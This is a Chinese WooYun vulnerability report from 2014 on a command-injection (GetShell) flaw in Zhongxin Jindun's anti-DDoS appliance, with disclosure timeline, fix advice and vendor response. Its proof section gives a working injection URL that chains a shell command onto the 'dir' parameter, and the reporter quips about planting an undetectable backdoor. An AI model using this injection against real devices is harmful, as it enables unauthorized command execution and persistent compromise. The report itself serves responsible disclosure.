漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-053477
漏洞标题:中新金盾抗拒绝服务系统GetShell漏洞2
相关厂商:安徽中新软件有限公司
漏洞作者: Tea
提交时间:2014-03-13 00:25
修复时间:2014-04-27 00:27
公开时间:2014-04-27 00:27
漏洞类型:命令执行
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-03-13: 细节已通知厂商并且等待厂商处理中
2014-03-19: 厂商已经确认,细节仅向厂商公开
2014-03-29: 细节向核心白帽子及相关领域专家公开
2014-04-08: 细节向普通白帽子公开
2014-04-18: 细节向实习白帽子公开
2014-04-27: 细节向公众公开
简要描述:
可以通过命令注入执行任意命令
详细说明:
需要登录:
通过请求一个构造好的参数,即可执行任意命令
漏洞证明:
https://1.1.1.1:28XXX/cgi-bin/index.php?t=analysis_download&c=tarfile&dir=1 || uname -a > /tmp/1||echo
命令:
uname -a > /tmp/1
写入到/tmp/1文件
可以写任意文件到任意目录,还愁啥?
PS:
这样的设备留个后门是极好的,管理员根本就没办法检查。。
修复方案:
dir 参数的话,就不要给它那么灵活的范围了吧。
版权声明:转载请注明来源 Tea@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2014-03-19 09:20
厂商回复:
与http:///bugs/wooyun-2014-一并由CNVD直接联系到软件生产厂商,并联系到技术部门负责人,由其后续一并处置。
最新状态:
暂无